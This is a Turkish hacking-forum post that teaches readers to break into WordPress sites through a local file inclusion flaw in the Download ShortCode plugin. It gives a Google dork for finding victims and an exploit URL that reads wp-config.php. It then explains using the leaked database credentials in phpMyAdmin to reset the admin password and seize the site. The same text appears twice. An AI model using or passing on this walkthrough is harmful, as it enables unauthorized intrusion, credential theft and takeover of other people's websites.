Turk Devilz
Yeni Üye
- Katılım
- 2 May 2014
- Mesajlar
- 131
- Tepkime puanı
- 0
- Puanları
- 0
Selamun Aleykum..
Bugun size yaklasık 1 hafta önce exploit-db sitesinde yayınlanan bir bugu anlatıcam..
Exploit Bilgileri;
# Exploit Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Google Dork : inurl:wp/wp-content/force-download.php (Geliştirilebilir..)
# Plugin Version : 1.1
# Plugin Name : Download ShortCode
# Date : 25/08/2014
##################################################################################################
Öncelikle yukarıda ki dorkumuzu Google’de aratıyoruz..
Çıkan sonuçlardan bir hedef site seçip Exploitimizi uyguluyoruz..
http://vi̇cti̇m/path/wp/wp-content/force-download.php?file=../wp-config.php
’wp-config.php’ dosyası çektik daha sonra ne yapabiliriz diye sorarsanız WGA bölümünde konusu geçmişti ama isterseniz ben bi daha degineyim..
WP-Config.php Dosyası içinde neler bulunur?
- phpMyAdmin giriş bilgileri mevcuttur.
Örnek wp-config.php dosyası kodları: http://codepad.org/bY97v4IB
Genellikle DB_HOST kısmında localhost yazar bazı arkadaslar bunu gorunce hemen bırakır ve baska sitelere bakar.
MysQL’e baglanabilmemiz için gereken 3 temel madde vardır.
1-) Sunucu adresi
2-) Database kullanıcı adı
3-) Database şifresi
Eğer bir wp-config.php dosyasını çekebildiyseniz zaten 2. ve 3. maddelere sahipsiniz demektir.(Bazılarında sunucu adreside yazar)
Sunucu adresini bulmak için ise http://whois.com.tr bu siteden hedef sitemizi taratıyoruz.(siteismi.com şeklinde.)
Örnek :
Burda elde ettigimiz ip/sunucu adresini kopyalayıp adres çubuğuna yazıyoruz ve sonuna /phpMyAdmin yazıp adrese gidiyoruz.
Aynen Şöyle :
Burdan sonra zaten geriye pek bişey kalmıyor wp-users tablosuna girip admin şifresini felan değiştirip wp-adminden panele login oluyoruz..
Anlatımda hatam olduysa affola..
Selametle..
Bugun size yaklasık 1 hafta önce exploit-db sitesinde yayınlanan bir bugu anlatıcam..
Exploit Bilgileri;
# Exploit Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Google Dork : inurl:wp/wp-content/force-download.php (Geliştirilebilir..)
# Plugin Version : 1.1
# Plugin Name : Download ShortCode
# Date : 25/08/2014
##################################################################################################
Öncelikle yukarıda ki dorkumuzu Google’de aratıyoruz..
Çıkan sonuçlardan bir hedef site seçip Exploitimizi uyguluyoruz..
http://vi̇cti̇m/path/wp/wp-content/force-download.php?file=../wp-config.php
’wp-config.php’ dosyası çektik daha sonra ne yapabiliriz diye sorarsanız WGA bölümünde konusu geçmişti ama isterseniz ben bi daha degineyim..
WP-Config.php Dosyası içinde neler bulunur?
- phpMyAdmin giriş bilgileri mevcuttur.
Örnek wp-config.php dosyası kodları: http://codepad.org/bY97v4IB
Genellikle DB_HOST kısmında localhost yazar bazı arkadaslar bunu gorunce hemen bırakır ve baska sitelere bakar.
MysQL’e baglanabilmemiz için gereken 3 temel madde vardır.
1-) Sunucu adresi
2-) Database kullanıcı adı
3-) Database şifresi
Eğer bir wp-config.php dosyasını çekebildiyseniz zaten 2. ve 3. maddelere sahipsiniz demektir.(Bazılarında sunucu adreside yazar)
Sunucu adresini bulmak için ise http://whois.com.tr bu siteden hedef sitemizi taratıyoruz.(siteismi.com şeklinde.)
Örnek :
Burda elde ettigimiz ip/sunucu adresini kopyalayıp adres çubuğuna yazıyoruz ve sonuna /phpMyAdmin yazıp adrese gidiyoruz.
Aynen Şöyle :
Burdan sonra zaten geriye pek bişey kalmıyor wp-users tablosuna girip admin şifresini felan değiştirip wp-adminden panele login oluyoruz..
Anlatımda hatam olduysa affola..
Selametle..